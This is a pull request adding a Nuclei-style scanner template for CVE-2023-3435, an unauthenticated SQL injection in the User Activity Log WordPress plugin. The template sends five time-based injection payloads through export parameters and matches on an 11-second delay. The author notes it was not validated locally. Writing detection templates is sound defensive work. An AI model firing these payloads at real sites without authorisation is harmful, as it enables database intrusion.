### PR TITLE
add cve-2023-3435 user activity log unauthenticated sqli

### DIFF
--- a/http/cves/2023/CVE-2023-3435.yaml
+++ b/http/cves/2023/CVE-2023-3435.yaml
@@ -1,0 +1,37 @@
+id: CVE-2023-3435
+info:
+  name: User Activity Log < 1.6.5 - Unauthenticated SQLi
+  author: Kazgangap
+  severity: critical
+  description: |
+    The User Activity Log WordPress plugin before 1.6.5 does not correctly sanitise and escape several parameters before using it in a SQL statement as part of its exportation feature, allowing unauthenticated attackers to conduct SQL injection attacks.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-3435
+    - https://wpscan.com/vulnerability/30a37a61-0d16-46f7-b9d8-721d983afc6b/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-3435
+    epss-score: 0.00211
+    epss-percentile: 0.58486
+    cpe: cpe:2.3:a:solwininfotech:user_activity_log:*:*:*:*:*:wordpress:*:*
+  metadata:
+    vendor: solwininfotech
+    product: user_activity_log
+    framework: wordpress
+  tags: wpscan,cve2023,wordpress,sqli,wp-plugin
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-admin/admin-post.php?export=user_logs&export-nonce=abc&userrole=abc%22+OR+sleep(11)%23+"
+      - "{{BaseURL}}/wp-admin/admin-post.php?export=user_logs&export-nonce=abc&username=abc%27+OR+sleep(11)%23+"
+      - "{{BaseURL}}/wp-admin/admin-post.php?export=user_logs&export-nonce=abc&type=abc%27+OR+sleep(11)%23+"
+      - "{{BaseURL}}/wp-admin/admin-post.php?export=user_logs&export-nonce=abc&txtsearch=abc%27+OR+sleep(11)%23+"
+      - "{{BaseURL}}/wp-admin/admin-post.php?export=user_logs&export-nonce=abc&showip=abc%27+OR+sleep(11)%23+"
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=11'


### PR DESCRIPTION
### Template / PR Information

The User Activity Log WordPress plugin before 1.6.5 does not correctly sanitise and escape several parameters before using it in a SQL statement as part of its exportation feature, allowing unauthenticated attackers to conduct SQL injection attacks.
Version 1.6.4 mitigates the issue for unauthenticated users but it is still exploitable by Subscribers and above.

add cve-2023-3435

References:
- https://nvd.nist.gov/vuln/detail/CVE-2023-3435
- https://wpscan.com/vulnerability/30a37a61-0d16-46f7-b9d8-721d983afc6b/

### Template Validation

I've validated this template locally?
- [ ] YES
- [x] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)